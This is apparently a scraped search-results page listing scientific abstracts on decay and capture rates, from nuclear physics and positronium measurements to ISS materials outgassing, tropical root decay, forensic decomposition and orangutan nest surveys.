has been maintaining a relatively pristine contamination environment for science payloads. Materials outgassing induced contamination is currently the dominant source for sensitive surfaces on ISS and modelling the outgassing rate decay over a 20 to 30 year period is challenging. Using ASTM E 1559 rate data, materials outgassing is described herein as a diffusion-reaction process with the interface playing a key role. The observation of -1/2 (diffusion) or non-integers (reaction limited) as rate decay exponents for common ISS materials indicate classical reaction kinetics is unsatisfactory in modelling materials outgassing. Nonrandomness of reactant concentrations at the interface is the source of this deviation from classical reaction kinetics. A t-1/2 decay is adopted as the result of the correlation of the contaminant layer thicknesses and composition on returned ISS hardware, the existence of high outgassing silicone exhibiting near diffusion limited decay, the confirmation of nondepleted material after ten years in Low Earth Orbit, and a potential slowdown of long term materials outgassing kinetics due to silicone contaminants at the interface. 16. Power Spectrum Analysis of BNL Decay-Rate Data DTIC Science & Technology 2010-01-01 93524, USA d Department of Physics, United States Air Force Academy, CO 80920, USA Keywords: Sun, Neutrinos • Corresponding author. Tel +1...irradiance data have been found to be closely related to rotation rate estimates derived from low-energy solar- neutrino data, this result supports the...recent conjecture that solar neutrinos may be responsible for variations in nuclear decay rates. We also carry out a similar comparison with local 17. Precision Measurement of the Singlet Positronium Decay Rate This is a new measurement of the annihilation decay rate, lambda_{S}, of parapositronium (p-Ps) as a test of quantum electrodynamics (QED). The measured value is lambda_ {S} = (7991.5 +/- 1.7) mu s^{-1}. At 210 ppm accuracy this result is 6.5 times more accurate than the previous measurement and is the first measurement sensitive enough to test the relative order alpha ^2lnalpha term in the QED calculation of lambda_{S}. This measurement, which is in agreement with theory, is particularly interesting in light of the 1500 ppm discrepancy between theory and experiment that still exists in the decay rate, lambda_{T}, of orthopositronium (o-Ps). This measurement is made using beta -decay positrons from a ^{68 }Ge-^{68}Ga source which form positronium in a variety of gas mixtures. The time interval between the emission of a positron and the detection of the annihilation gamma -ray is measured with a time-to-digital converter. The distribution of the time intervals is collected as an annihilation lifetime spectrum. lambda_{S } is measured indirectly by using magnetic mixing. In a magnetic field the m = 0 ground states mix to produce a state, o-Ps^', which has a faster decay rate, lambda_sp {T}{'}. Hence, at any gas density, rho, the histogram is fitted to two exponential components with decay rates, lambda_{T}(rho) and lambda_sp{T}{' }(rho). A quantity, Lambda( rho), linear in the gas density and equal to lambda_{S} at zero density, is calculated from the two measured decay rates and the value of the magnetic field. It is found that Lambda(rho) has a small slope due to spin exchange quenching in the gas. This slope is measured in a separate experiment and a correction is made for this. The quantity lambda_{S } is separately measured in N_2 and CO_2 (each mixed with various small percentages of isobutane) over a wide range of pressures and at two values of the magnetic field. The measured values of lambda_{S } are in agreement. The measurement in CO _2 is considered as a 18. New search for double electron capture in {sup 106}Cd decay with the TGV-2 spectrometer SciTech Connect Briançon, Ch.; Brudanin, V. B.; Egorov, V. G.; Jose, J. M.; Klimenko, A. A.; Kovalik, A.; Rosov, S. V.; Rukhadze, E. N.; Rukhadze, N. I. Salamatin, A. V.; Timkin, V. V.; Fajt, L.; Hodak, R.; Šimkovic, F.; Shitov, Yu. A.; Špavorova, M.; Štekl, I.; Yakushev, E. A. 2015-09-15 A new experiment devoted to searches for double electron capture in {sup 106}Cd decay is being performed at the Modane underground laboratory (4800 mwe) with the 32-detector TGV-2 spectrometer. The limit T{sub 1/2}(2νEC/EC) > 2.0×10{sup 20} yr at a 90%confidence level (C.L.) was obtained from a preliminary analysis of data obtained over 2250 h of measurements with about 23.2 g sample enriched in the isotope {sup 106}Cd to 99.57%. The limits T{sub 1/2}(KL, 2741 keV) > 0.9 × 10{sup 20} yr and T{sub 1/2}(KK, 2718 keV) ≫ 1.4 × 10{sup 20} yr at a 90% C.L. on the neutrinoless decay of {sup 106}Cd were obtained from measurements performed with the Obelix low-background spectrometer from high-purity germanium (HPGe spectrometer) for a sample of mass about 23.2 g enriched in the isotope {sup 106}Cd. 19. Time Modulation of the {beta}{sup +}-Decay Rate of H-Like {sup 140}Pr{sup 58+} Ions SciTech Connect Ivanov, A. N.; Kryshen, E. L.; Pitschmann, M.; Kienle, P. 2008-10-31 Recent experimental data at GSI on the rates of the number of daughter ions, produced by the nuclear K-shell electron capture (EC) decays of the H-like ions {sup 140}Pr{sup 58+} and {sup 142}Pm{sup 60+}, suggest that they are modulated in time with periods T{sub EC}{approx_equal}7 sec and amplitudes a{sub EC}{approx_equal}0.20. Since it is known that these ions are unstable also under the nuclear positron ({beta}{sup +}) decays, we study a possible time dependence of the nuclear {beta}{sup +}-decay rate of the H-like {sup 140}Pr{sup 58+} ion. We show that the time dependence of the {beta}{sup +}-decay rate of the H-like {sup 140}Pr{sup 58+} ion as well as any H-like heavy ions cannot be observed. 20. Effects of fog droplets on wake vortex decay rate NASA Technical Reports Server (NTRS) Moulden, T. H.; Frost, W. 1976-01-01 A simple model for the motion of particles in a laminar line vortex is discussed. The energy required to accelerate a set of these particles was determined and shown to be only a small fraction of the energy content of the vortex flow. It is shown that this energy transfer is unlikely to be sufficient to significantly modify the vortex decay rate. It is further argued that the effect of the particle on the viscous properties of the resulting two phase fluid leads to a slower decay rate than in single phase air flow. However, this conclusion may not necessarily follow for turbulence flows. Results show that the migration of particles to the outer flow results in a redistribution of the velocity profile in the vortex and in a non-uniform two phase viscosity across the core. It is suggested that these effects may accelerate vortex bursting. 1. 31Cl beta decay and the 30P31S reaction rate in nova nucleosynthesis Bennett, Michael; Wrede, C.; Brown, B. A.; Liddick, S. N.; Pérez-Loureiro, D.; NSCL e12028 Collaboration 2016-03-01 The 30P31S reaction rate is critical for modeling the final isotopic abundances of ONe nova nucleosynthesis, identifying the origin of presolar nova grains, and calibrating proposed nova thermometers. Unfortunately, this rate is essentially experimentally unconstrained because the strengths of key 31S proton capture resonances are not known, due to uncertainties in their spins and parities. Using a 31Cl beam produced at the National Superconducting Cyclotron Laboratory, we have populated several 31S states for study via beta decay and devised a new decay scheme which includes updated beta feedings and gamma branchings as well as multiple states previously unobserved in 31Cl beta decay. Results of this study, including the unambiguous identification due to isospin mixing of a new l = 0 , Jπ = 3 /2+ 31S resonance directly in the middle of the Gamow Window, will be presented, and significance to the evaluation of the 30P31S reaction rate will be discussed. Work supported by U.S. Natl. Sci. Foundation (Grants No. PHY-1102511, PHY-1404442, PHY-1419765, and PHY-1431052); U.S. Dept. of Energy, Natl. Nucl. Security Administration (Award No. DE-NA0000979); Nat. Sci. and Eng. Research Council of Canada. 2. The MuCap experiment: A measurement of the muon capture rate in hydrogen gas SciTech Connect Banks, T. I. 2007-10-26 We have recently measured the rate of nuclear muon capture by the proton, using a novel technique which involves a time projection chamber operating in ultraclean, deuterium-depleted hydrogen gas. The target's low gas density of 1% compared to liquid hydrogen is key to avoiding uncertainties that arise from the formation of muonic molecules. The capture rate from the hyperfine singlet ground state of the {mu}p atom was obtained from the difference between the {mu}{sup -} disappearance rate in hydrogen and the world average for the {mu}{sup +} decay rate, yielding {lambda}{sub S} = 725.0{+-}17.4 s{sup -1}, from which the induced pseudoscalar coupling of the nucleon, g{sub P}(q{sup 2} = 0.88m{sub {mu}}{sup 2}) = 7.3{+-}1.1, is extracted. This result is consistent with theoretical predictions for g{sub P} that are based on the approximate chiral symmetry of QCD. 3. Strong neutrino cooling by cycles of electron capture and β- decay in neutron star crusts. PubMed Schatz, H; Gupta, S; Möller, P; Beard, M; Brown, E F; Deibel, A T; Gasques, L R; Hix, W R; Keek, L; Lau, R; Steiner, A W; Wiescher, M 2014-01-02 The temperature in the crust of an accreting neutron star, which comprises its outermost kilometre, is set by heating from nuclear reactions at large densities, neutrino cooling and heat transport from the interior. The heated crust has been thought to affect observable phenomena at shallower depths, such as thermonuclear bursts in the accreted envelope. Here we report that cycles of electron capture and its inverse, β(-) decay, involving neutron-rich nuclei at a typical depth of about 150 metres, cool the outer neutron star crust by emitting neutrinos while also thermally decoupling the surface layers from the deeper crust. This 'Urca' mechanism has been studied in the context of white dwarfs and type Ia supernovae, but hitherto was not considered in neutron stars, because previous models computed the crust reactions using a zero-temperature approximation and assumed that only a single nuclear species was present at any given depth. The thermal decoupling means that X-ray bursts and other surface phenomena are largely independent of the strength of deep crustal heating. The unexpectedly short recurrence times, of the order of years, observed for very energetic thermonuclear superbursts are therefore not an indicator of a hot crust, but may point instead to an unknown local heating mechanism near the neutron star surface. 4. Strong neutrino cooling by cycles of electron capture and decay in neutron star crusts SciTech Connect Schatz, Hendrik; Gupta, Sanjib; Moeller, Peter; Beard, Mary; Brown, Edward; Deibel, A. T.; Gasques, Leandro; Hix, William Raphael; Keek, Laurens; Lau, Rita; Steiner, Andrew M; Wiescher, Michael 2013-01-01 The temperature in the crust of an accreting neutron star, which comprises its outermost kilometre, is set by heating from nuclear reactions at large densities, neutrino cooling and heat transport from the interior. The heated crust has been thought to affect observable phenomena at shallower depths, such as thermonuclear bursts in the accreted envelope. Here we report that cycles of electron capture and its inverse, decay, involving neutron-rich nuclei at a typical depth of about 150 metres, cool the outer neutron star crust by emitting neutrinos while also thermally decoupling the surface layers from the deeper crust. This Urca mechanism has been studied in the context of white dwarfs13 and type Ia supernovae, but hitherto was not considered in neutron stars, because previous models1, 2 computed the crust reactions using a zero-temperature approximation and assumed that only a single nuclear species was present at any given depth. The thermal decoupling means that X-ray bursts and other surface phenomena are largely independent of the strength of deep crustal heating. The unexpectedly short recurrence times, of the order of years, observed for very energetic thermonuclear superbursts are therefore not an indicator of a hot crust, but may point instead to an unknown local heating mechanism near the neutron star surface. 5. Solvent Polarity Effect on Nonradiative Decay Rate of Thioflavin T. PubMed Stsiapura, Vitali I; Kurhuzenkau, Siarhei A; Kuzmitsky, Valery A; Bouganov, Oleg V; Tikhomirov, Sergey A 2016-07-21 It has been established earlier that fluorescence quantum yield of thioflavin T (ThT)-a probe widely used for amyloid fibrils detection-is viscosity-dependent, and photophysical properties of ThT can be well-described by the fluorescent molecular rotor model, which associates twisted internal charge transfer (TICT) reaction with the main nonradiative decay process in the excited state of the dye. Solutions of ThT in a range of polar solvents were studied using steady-state fluorescence and sub-picosecond transient absorption spectroscopy methods, and we showed that solvent effect on nonradiative transition rate knr cannot be reduced to the dependence on viscosity only and that ∼3 times change of knr can be observed for ThT in aprotic solvents and water, which correlates with solvent polarity. Different behavior was observed in alcohol solutions, particularly in longer n-alcohols, where TICT rate was mainly determined by rotational diffusion of ThT fragments. Quantum-chemical calculations of S0 → S1 transition energy were performed to get insight of polar solvent contribution to the excited-state energy stabilization. Effect of polar solvent on electronic energy levels of ThT was simulated by applying homogeneous electric field according to the Onsager cavity model. Static solvent effect on the excited-state potential energy surface, where charge transfer reaction takes place, was not essential to account for experimentally observed TICT rate differences in water and aprotic solvents. From the other side, nonradiative decay rate of ThT in water, ethylene glycol, and aprotic solvents was found to follow dynamics of polar solvation knr ∼ τS(-1), which can explain dependence of the TICT rate on both polarity and viscosity of the solvents. 6. Charge-exchange reactions and electron-capture rates for presupernova stellar evolution Zegers, Remco 2015-04-01 Weak reaction rates such as electron captures and beta decays play major roles in a variety of astrophysical phenomena, such as core-collapse and thermonuclear supernovae and accreting neutron stars. Consequently, the use of accurate weak reaction rates in astrophysical simulations to understand these phenomena is important. Unfortunately, the number of relevant nuclei is typically very large, and, except for a few special cases, it is impossible to rely on experimental results only: theoretical models must be used to estimate the weak reaction rates. These models can then be benchmarked and improved on the basis of a limited number of experimental data. The most important nuclear structure input that is required for calculating weak reaction rates are Gamow-Teller transition strengths. Although these can be extracted from beta and electron-capture decay data, the energy window accessible by such experiments is limited, if accessible at all. However, at the high temperatures and densities that occur in massive stars prior to the cataclysmic demise, transitions to final states at high excitation energies are important. In addition, to properly test theory, full Gamow-Teller transition strength distributions are very valuable. Fortunately, nature is kind: charge-exchange experiments at intermediate energies can provide the relevant strength distributions over a wide energy window and a variety of charge-exchange probes, such as (p,n), (n,p), (d,2 He) and (t,3 He) have been used to extract strengths of relevance for astrophysics (and for other purposes). This presentation will focus on efforts to validate electron capture rates calculated based on nuclear structure models for nuclei with masses ranging from A ~ 40-65, and on studies aimed at testing astrophysical sensitivities to uncertainties/deviations in the theoretical rates. These efforts include experiments with unstable isotopes, and special gamma-ray coincidence techniques to localize very weak, but 7. No evidence for a decrease of nuclear decay rates with increasing heliocentric distance based on radiochronology of meteorites Meier, Matthias M. M.; Wieler, Rainer 2014-03-01 . Moreover, the oldest U-Pb ages of meteorites agree with the main-sequence age of the sun derived from helioseismology within the formal ˜1% uncertainty of the latter. Meteorite ages also provide no evidence for a decrease of decay rates with heliocentric distance for nuclides such as 87Rb (decay mode β-) 40K (β- and electron capture), and 147Sm (α). 8. Precision measurements of positronium decay rate and energy level SciTech Connect Asai, S.; Kataoka, Y.; Kobayashi, T.; Namba, T.; Suehara, T.; Akimoto, G.; Ishida, A.; Hashimoto, M. M.; Saito, H.; Idehara, T.; Yoshida, M. 2008-08-08 Positronium is an ideal system for the research of the bound state QED. New precise measurement of orthopositronium decay rate has been performed with an accuracy of 150 ppm, and the result combined with the last three is 7.0401{+-}0.0007 {mu}s{sup -1}. It is the first result to validate the 2nd order correction. The Hyper Fine Splitting of positronium is sensitive to the higher order corrections of the QED prediction and also to the new physics beyond Standard Model via the quantum oscillation into virtual photon. The discrepancy of 3.5{sigma} is found recently between the measured values and the QED prediction (O({alpha}{sup 3})). It might be due to the contribution of the new physics or the systematic problems in the previous measurements: (non-thermalized Ps and non-uniformity of the magnetic field). We propose new methods to measure HFS precisely without the these uncertainties. 9. New decay branches of the radiative capture reaction {sup 12}C({sup 16}O,{gamma}){sup 28}Si SciTech Connect Lebhertz, D.; Courtin, S.; Haas, F.; Salsac, M.-D.; Beck, C.; Michalon, A.; Rousseau, M.; Marley, P. L.; Glover, R. G.; Kent, P. E.; Hutcheon, D. A.; Davis, C.; Pearson, J. E. 2009-01-28 Resonances in the {sup 12}C({sup 16}O,{gamma}){sup 28}Si radiative capture process at energies around the Coulomb barrier have been probed using the very selective 0 deg. Dragon spectrometer at Triumf and its associated BGO {gamma}-array. For the first time the full level scheme involved in this process has been measured and shows previously unobserved {gamma}-decay to doorway states around 11 MeV in {sup 28}Si. 10. Fine root decay rates vary widely among lowland tropical tree species. PubMed Raich, James W; Russell, Ann E; Valverde-Barrantes, Oscar 2009-08-01 Prolific fine root growth coupled with small accumulations of dead fine roots indicate rapid rates of fine root production, mortality and decay in young tree plantations in lowland Costa Rica. However, published studies indicate that fine roots decay relatively slowly in tropical forests. To resolve this discrepancy, we used the intact-core technique to quantify first-year decay rates of fine roots in four single-species plantations of native tree species. We tested three hypotheses: first, that fine roots from different tree species would decay at different rates; second, that species having rapid fine root growth rates would also have rapid rates of fine root decay; and third, that differences in fine root decay among species could be explained by fine root chemistry variables previously identified as influencing decay rates. Fine roots in Virola koschnyi plantations decayed very slowly (k = 0.29 +/- 0.15 year(-1)); those of Vochysia guatemalensis decayed seven times faster (k = 2.00 +/- 0.13 year(-1)). Decay rates of the remaining two species, Hieronyma alchorneoides and Pentaclethra macroloba, were 1.36 and 1.28 year(-1), respectively. We found a positive, marginally significant correlation between fine root decay rates and the relative growth rates of live fine roots (R = 0.93, n = 4, P = 0.072). There was a highly significant negative correlation between fine root decay and fine root lignin:N (R = 0.99, P = 0.01), which supports the use of lignin:N as a decay-controlling factor within terrestrial ecosystem models. The decay rates that we observed in this single study location encompassed the entire range of fine root decay rates previously observed in moist tropical forests, and thus suggest great potential for individual tree species to alter belowground organic matter and nutrient dynamics within a biotically rich rainforest environment. 11. Magnetic Flux Emergence and Decay Rates for Preceder and Follower Sunspots Observed with HMI Norton, A. A.; Jones, E. H.; Linton, M. G.; Leake, J. E. 2017-06-01 We quantify the emergence and decay rates of preceder (p) and follower (f) sunspots within 10 active regions from 2010 to 2014 using Space-weather Helioseismic Magnetic Imager Active Region Patch data. The sunspots are small to mid-sized regions and contain a signed flux within a single polarity sunspot of (1.1{--}6.5)× {10}21 {Mx}. The net unsigned flux within the regions, including plage, ranges from (5.1{--}20)× {10}21 {Mx}. Rates are calculated with and without intensity contours to differentiate between sunspot formation and flux emergence. Signed flux emergence rates, calculated with intensity contours, for the p (f) spots average 6.8(4.9)× {10}19 {Mx} hr-1, while decay rates are -1.9(-3.4)× {10}19 {Mx} hr-1. The mean, signed flux emergence rate of the regions, including plage, is 7.1× {10}19 {Mx} hr-1, for a mean peak flux of 5.9× {10}21 {Mx}. Using a synthesis of these results and others reported previously, there is a clear trend for larger flux regions to emerge faster than smaller ones. Observed emergence rates (dφ /{dt}, Mx hr-1) scale with total signed peak flux, {\\tilde{φ }}\\max , as a power law with an exponent of 0.36, i.e., dφ /{dt}=A{\\tilde{φ }}\\max 0.36. The observed rates may assist in constraining the boundary and initial conditions in simulations which already demonstrate increased rates for flux tubes with higher buoyancy and twist, or in the presence of a strong upflow. Overall, the observed emergence rates are smaller than those in simulations, which may indicate a slower rise of the flux in the interior than what is captured in simulations. 12. Formation and decay of C - 60 following free electron capture by C60 Matejčik, Štefan; Märk, Tilmann D.; Španěl, Patrik; Smith, David; Jaffke, Thomas; Illenberger, Eugen 1995-02-01 The results of a detailed crossed electron/molecular beam study of electron attachment to C60 molecules and electron detachment from C-60 over the range of electron energies from near zero to about 15 eV are described. It is shown by comparing the experimental data for the attachment cross sections (normalized to the absolute thermal cross sections determined using the flowing afterglow/Langmuir probe apparatus) with quantum calculations that attachment occurs at low energies in the p-wave channel, and in the d- and f-wave channels (and probably higher-order partial waves) at the higher electron energies. At electron energies above 7 eV, thermal detachment of electrons from the hot C-60 negative ions is seen to occur, and the unimolecular rate coefficients for detachment, kd, have been determined as a function of the energy of the attaching electron. Hence, by relating kd to the derived temperature of the hot C-60 ions, the electron detachment energy, Ed, has been determined as 2.6 eV, which is close to the electron affinity of C60 as measured by photodetachment from cold C-60 ions. Additionally, by combining the measured attachment rate coefficients, ka, from the previous flowing afterglow/Langmuir probe study with the kd data determined in this study, equilibrium constants for the detachment/attachment reactions have been obtained which are reconciled with those calculated using total partition functions. An important conclusion to be drawn from all these studies is that C60 very efficiently captures electrons over the wide electron energy range from about 0.2 eV to around 15 eV and retains them if the energy released in the electron capture process can be removed before thermal detachment can occur. 13. 12C(16O,γ)28Si radiative capture: Structural and statistical aspects of the γ decay Lebhertz, D.; Courtin, S.; Haas, F.; Jenkins, D. G.; Simenel, C.; Salsac, M.-D.; Hutcheon, D. A.; Beck, C.; Cseh, J.; Darai, J.; Davis, C.; Glover, R. G.; Goasduff, A.; Kent, P. E.; Levai, G.; Marley, P. L.; Michalon, A.; Pearson, J. E.; Rousseau, M.; Rowley, N.; Ruiz, C. 2012-03-01 The heavy-ion radiative capture reaction 12C(16O,γ)28Si has been studied at three energies Ec.m.=8.5, 8.8, and 9 MeV which are close to the Coulomb barrier. The weak radiative capture process has been identified by measuring the 28Si recoils in the highly selective 0∘ spectrometer DRAGON at TRIUMF (Vancouver). The coincident γ rays have been recorded in the associated BGO array. This has allowed a complete measurement of the γ spectrum and the relative strength of all decay pathways. An important part of the decay through quasibound states close to the particle threshold and the feeding of bound states with particular deformation have been identified for the first time. Comparisons with Monte Carlo simulations allowed the extraction of the full experimental radiative capture cross section. Our results suggest an important contribution of spins Jπ=5- and 6+ in the entrance channel. The surprisingly large cross sections from 12 μb at Ec.m.=8.5 MeV to 25 μb at Ec.m.=9.0 MeV for the heavy-ion radiative capture process are discussed in terms of the interplay between statistical and structural aspects of the process. 14. Decay rates of human remains in an arid environment. PubMed Galloway, A; Birkby, W H; Jones, A M; Henry, T E; Parks, B O 1989-05-01 The environment of southern Arizona with mild winters and hot, dry summers produces great variability in decay rates of human remains. Summer temperatures, which range well over 38 degrees C (100 degrees F), induce rapid bloating as a result of the accumulation of decompositional gases. However, in certain circumstances, the aridity can lead to extensive mummification, allowing preservation of remains for hundreds of years. A retrospective study of 189 cases, concentrating on remains found on the desert floor or in the surrounding mountains and on remains found within closed structures, outlines the time frame and sequences of the decay process. Remains can retain a fresh appearance for a considerable time in the winter, but the onset of marked decomposition is rapid in the summer months. Bloating of the body usually is present two to seven days following death. Following this, within structures, there is frequently rapid decomposition and skeletonization. With outdoor exposure, remains are more likely to pass through a long period of dehydration of outer tissues, mummification, and reduction of desiccated tissue. Exposure of large portions of the skeleton usually does not occur until four to six months after death. Bleaching and exfoliation of bone--the beginning stages of destruction of the skeletal elements--begins at about nine months' exposure. Insect activity, including that of maggot and beetle varieties, may accelerate decomposition, but this process is greatly affected by location of the body, seasonal weather, and accessibility of the soft tissues. Carnivores and other scavengers also are contributing factors, as are clothing or covering of the body, substrate, elevation, and latitude. 15. Accumulation and decay of visual capture and the ventriloquism aftereffect caused by brief audio-visual disparities. PubMed Bosen, Adam K; Fleming, Justin T; Allen, Paul D; O'Neill, William E; Paige, Gary D 2017-02-01 Visual capture and the ventriloquism aftereffect resolve spatial disparities of incongruent auditory visual (AV) objects by shifting auditory spatial perception to align with vision. Here, we demonstrated the distinct temporal characteristics of visual capture and the ventriloquism aftereffect in response to brief AV disparities. In a set of experiments, subjects localized either the auditory component of AV targets (A within AV) or a second sound presented at varying delays (1-20 s) after AV exposure (A2 after AV). AV targets were trains of brief presentations (1 or 20), covering a ±30° azimuthal range, and with ±8° (R or L) disparity. We found that the magnitude of visual capture generally reached its peak within a single AV pair and did not dissipate with time, while the ventriloquism aftereffect accumulated with repetitions of AV pairs and dissipated with time. Additionally, the magnitude of the auditory shift induced by each phenomenon was uncorrelated across listeners and visual capture was unaffected by subsequent auditory targets, indicating that visual capture and the ventriloquism aftereffect are separate mechanisms with distinct effects on auditory spatial perception. Our results indicate that visual capture is a 'sample-and-hold' process that binds related objects and stores the combined percept in memory, whereas the ventriloquism aftereffect is a 'leaky integrator' process that accumulates with experience and decays with time to compensate for cross-modal disparities. 16. Time-Modulation of Orbital Electron Capture Decays by Mixing of Massive Neutrinos Sms Collaboration; Kienle, P.; SMS Collaboration 2009-08-01 We report on the observation of time-modulated orbital EC decays of H-like 140Pr58+, 142Pm60+, and 122I52+ (preliminary) ions with only one electron in the K-shell coasting in the ESR storage ring of GSI with a velocity β=0.71 and a spread Δv/v˜5×10. The decays were observed with time resolved single ion Schottky Mass Spectroscopy by observation of the time of change of the precisely measured revolution frequency of the mother into the daughter ion which is proportional to the mass change or Q-value of the decay. We observed in the EC-branches exponential decay curves time-modulated with periods T=7.06(8)s and amplitude a=0.18(3) for 140Pr decays, T=7.10(22)s and a=0.23(4) for 142Pm decays, and T=6.04(6)s and a=0.19(3) for 122I decays (preliminary) in the laboratory frame. The simultaneously measured β branch of 142Pm shows no modulation with a<0.03. An explanation by mixing of massive electron neutrinos has been suggested, according to which the observed modulation frequency yields a value for the quadratic mass difference: m22-m12=2.22(3)×10eV. This value is 2.9 times larger than the value derived by the KamLAND antineutrino oscillation experiment. 17. Parametric control of collision rates and capture rates in geometrically enhanced differential immunocapture (GEDI) microfluidic devices for rare cell capture PubMed Central Smith, James P.; Lannin, Timothy B.; Syed, Yusef A.; Santana, Steven M.; Kirby, Brian J. 2013-01-01 The enrichment and isolation of rare cells from complex samples, such as circulating tumor cells (CTCs) from whole blood, is an important engineering problem with widespread clinical applications. One approach uses a microfluidic obstacle array with an antibody surface functionalization to both guide cells into contact with the capture surface and to facilitate adhesion; geometrically enhanced differential immunocapture is a design strategy in which the array is designed to promote target cell–obstacle contact and minimize other interactions (Gleghorn et al., 2010; Kirby et al., 2012). We present a simulation that uses capture experiments in a simple Hele-Shaw geometry (Santana et al., 2012) to inform a target-cell-specific capture model that can predict capture probability in immunocapture microdevices of any arbitrary complex geometry. We show that capture performance is strongly dependent on the array geometry, and that it is possible to select an obstacle array geometry that maximizes capture efficiency (by creating combinations of frequent target cell–obstacle collisions and shear stress low enough to support capture), while simulatenously enhancing purity by minimizing non-specific adhesion of both smaller contaminant cells (with infrequent cell–obstacle collisions) and larger contaminant cells (by focusing those collisions into regions of high shear stress). PMID:24078270 18. Decay rates of spherical and deformed proton emitters SciTech Connect Davids, C. N.; Esbensen, H. 1999-11-23 Using Green's function techniques, the authors derive expressions for the width of a proton decaying state in spherical and deformed nuclei. The authors show that the proton decay widths calculated by the exact expressions of Maglione et al. are equivalent to the distorted wave expressions of Bugrov et al., and that of {angstrom} berg et al. in the spherical case. 19. Inferring neutron capture rates of short-lived isotopes Liddick, Sean 2015-04-01 Neutron capture reactions on short-lived nuclei play an important role in astrophysical processes such as the rapid neutron capture process. However, these cross sections are difficult to measure in the laboratory. The so-called beta-Oslo technique has been developed for constraining the neutron capture cross sections of short-lived nuclei by combining beta-delayed gamma-ray spectroscopy and the Oslo method to extract nuclear level densities and gamma-ray strength functions. The two quantities are used within the framework of a Hauser-Feshbach model to constrain the neutron capture cross section. The technique will be described and the inferred neutron capture cross sections for a preliminary set of nuclei presented. The experimental reach of the technique at current facilities and eventually at the upcoming Facility for Radioactive Ion Beams (FRIB) as well as the overlap with astrophysical processes will be discussed. This work was supported by the National Science Foundation under Grants No. PHY 102511, No. PHY 0822648, No. PHY 1350234 and by the Research Council of Norway, Project Grant No. 205528. 20. Evaluating orangutan census techniques using nest decay rates: implications for population estimates. PubMed Mathewson, P D; Spehar, S N; Meijaard, E; Nardiyono; Purnomo; Sasmirul, A; Sudiyanto; Oman; Sulhnudin; Jasary; Jumali; Marshall, A J 2008-01-01 An accurate estimate for orangutan nest decay time is a crucial factor in commonly used methods for estimating orangutan population size. Decay rates are known to vary, but the decay process and, thus, the temporal and spatial variation in decay time are poorly understood. We used established line-transect methodology to survey orangutan nests in a lowland forest in East Kalimantan, Indonesia, and monitored the decay of 663 nests over 20 months. Using Markov chain analysis we calculated a decay time of 602 days, which is significantly longer than times found in other studies. Based on this, we recalculated the orangutan density estimate for a site in East Kalimantan; the resulting density is much lower than previous estimates (previous estimates were 3-8 times higher than our recalculated density). Our data suggest that short-term studies where decay times are determined using matrix mathematics may produce unreliable decay times. Our findings have implications for other parts of the orangutan range where population estimates are based on potentially unreliable nest decay rate estimates, and we recommend that for various parts of the orangutan range census estimates be reexamined. Considering the high variation in decay rates there is a need to move away from using single-number decay time estimates and, preferably, to test methods that do not rely on nest decay times as alternatives for rapid assessments of orangutan habitat for conservation in Borneo. 1. How to calculate α-decay rates in the future? Carlsson, B. Gillis; Ward, Daniel E.; Åberg, Sven 2016-12-01 New elements discovered during past decades have been created in fusion reactions where a lighter nucleus is collided with a heavier one. The new elements created often decay by emitting α particles. From the half-lives of the decays and the energies of the emitted particles one may extract some properties of the new elements. In this talk the recent work performed by the Lund group to model α decay starting from nuclear density-functional theory is reviewed and a possible extension is mentioned. 2. Enhanced capture rate for haze defects in production wafer inspection Auerbach, Ditza; Shulman, Adi; Rozentsvige, Moshe 2010-03-01 involved scanning with three different recipe types: Standard Inspection: Nominal recipe with a low false alarm rate was used to scan the wafer and repeaters were extracted from the final defect map. Haze Monitoring Application: Recipe sensitivity was enhanced and run on a single field column from which on repeating defects were extracted. Enhanced Repeater Extractor: Defect processing included the two parallel routes: a nominal recipe for the random defects and the new high sensitive repeater extractor algorithm. The results showed that the new application (recipe #3) had the highest capture rate on haze defects and detected new repeater defects not found in the first two recipes. In addition, the recipe was much simpler to setup since repeaters are filtered separately from random defects. We expect that in the future, with the advent of mask-less lithography and EUV lithography, the monitoring of field and die repeating defects on the wafer will become a necessity for process control in the semiconductor fab. 3. Complex Degradation Processes Lead to Non-Exponential Decay Patterns and Age-Dependent Decay Rates of Messenger RNA PubMed Central Deneke, Carlus; Lipowsky, Reinhard; Valleriani, Angelo 2013-01-01 4. Electron-capture branch of {sup 100}Tc and tests of nuclear wave functions for double-{beta} decays. SciTech Connect Sjue, S. K. L.; Melconian, D.; Garcia, A.; Ahmad, I.; Algora, A.; Aysto, J.; Elomaa, V.-V.; Eronen, T.; Hakala, J.; Hoedl, S.; Kankainen, A.; Kessler, T.; Moore, I. D.; Naabe, F.; Penttila, H.; Rahaman, S.; Saastamoinen, A.; Swanson, H. E.; Weber, C.; Triambak, S.; Deryckx, K.; Physics; Univ. of Washington; Texas A&M Univ.; Univ. of Valencia; Hungarian Academy of Sciences; Univ. of Jyvaskyla; Univ. of Michigan 2008-12-30 We present a measurement of the electron-capture branch of {sup 100}Tc. Our value, B(EC) = (2.6 {+-} 0.4) x 10{sup -5}, implies that the {sup 100}Mo neutrino absorption cross section to the ground state of {sup 100}Tc is roughly 50% larger than previously thought. Disagreement between the experimental value and QRPA calculations relevant to double-{beta} decay matrix elements persists. We find agreement with previous measurements of the 539.5- and 590.8-keV {gamma}-ray intensities. 5. Radiative capture studies of the electromagnetic decays of highly excited states SciTech Connect Snover, K.A. 1980-01-01 Selected examples of interesting E1, M1, and E2 resonance studies in (p,..gamma..) and (..cap alpha..,..gamma..) reactions are discussed. These include a unique determination of E1 amplitudes in the /sup 12/C(P,..gamma../sub 0/)/sup 13/N reaction, E2 strength in light nuclei, M1 decays to the ground states and to the excited O/sup +/ states of the doubly magic /sup 16/O and /sup 40/Ca nuclei, second harmonic E1 resonances in (p,..gamma..), and M1 ..gamma..-decay of stretched particle-hole states in /sup 16/O and /sup 28/Si. 6. On the gauge invariance of the decay rate of false vacuum Endo, Motoi; Moroi, Takeo; Nojiri, Mihoko M.; Shoji, Yutaro 2017-08-01 We study the gauge invariance of the decay rate of the false vacuum for the model in which the scalar field responsible for the false vacuum decay has gauge quantum number. In order to calculate the decay rate, one should integrate out the field fluctuations around the classical path connecting the false and true vacua (i.e., so-called bounce). Concentrating on the case where the gauge symmetry is broken in the false vacuum, we show a systematic way to perform such an integration and present a manifestly gauge-invariant formula of the decay rate of the false vacuum. 7. Investigation of photoneutron and capture gamma-ray production in Pb and W under irradiation from 16N decay radiation Kebwaro, Jeremiah Monari; Zhao, Yaolin; He, Chaohui 2015-09-01 Lead and tungsten are potential alternative materials for shielding reactor ex-core components with high 16N activity when available space limits application of concrete. Since the two materials are vulnerable to photonuclear reactions, the nature and intensity of the secondary radiation 